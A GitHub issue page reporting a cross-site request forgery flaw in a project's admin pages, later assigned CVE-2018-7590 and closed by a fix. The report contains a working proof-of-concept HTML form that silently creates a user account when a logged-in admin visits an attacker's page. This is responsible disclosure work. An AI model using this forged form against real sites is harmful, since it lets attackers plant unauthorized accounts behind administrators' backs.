Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF issue that allows attacker to create an account #45

Closed
fvi-att opened this issue Mar 1, 2018 · 1 comment · Fixed by #56
Closed

CSRF issue that allows attacker to create an account #45

fvi-att opened this issue Mar 1, 2018 · 1 comment · Fixed by #56

Comments

@fvi-att
Copy link

fvi-att commented Mar 1, 2018

Hello. I want to report it has CSRF issue in admin pages.
When attacker induce authenticated admin user to a malicious web page, the account will be created without admin user's intention.

Here is how to reproduce the issue.
1. Login to admin page.(/admin)
2. Keep login and access the html it has following content

<html>
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="http://your.content.example.com" method="POST">
     <input type="hidden" name="username" value="test1" />
     <input type="hidden" name="email" value="test1&#64;example&#46;com" />
     <input type="hidden" name="password" value="test" />
     <input type="hidden" name="con&#95;password" value="test" />
     <input type="hidden" name="submit" value="Save" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>
  1. And account username = test1 is created without admin user's intention.
@fvi-att fvi-att changed the title CSRF issue that allow to attacker create an account CSRF issue that allows to attacker create an account Mar 1, 2018
@fvi-att fvi-att changed the title CSRF issue that allows to attacker create an account CSRF issue that allows attacker to create an account Mar 1, 2018
@fvi-att
Copy link
Author

fvi-att commented Mar 2, 2018

CVE-2018-7590 is assigned.

@havok89 havok89 linked a pull request May 1, 2020 that will close this issue
@havok89 havok89 closed this as completed May 1, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants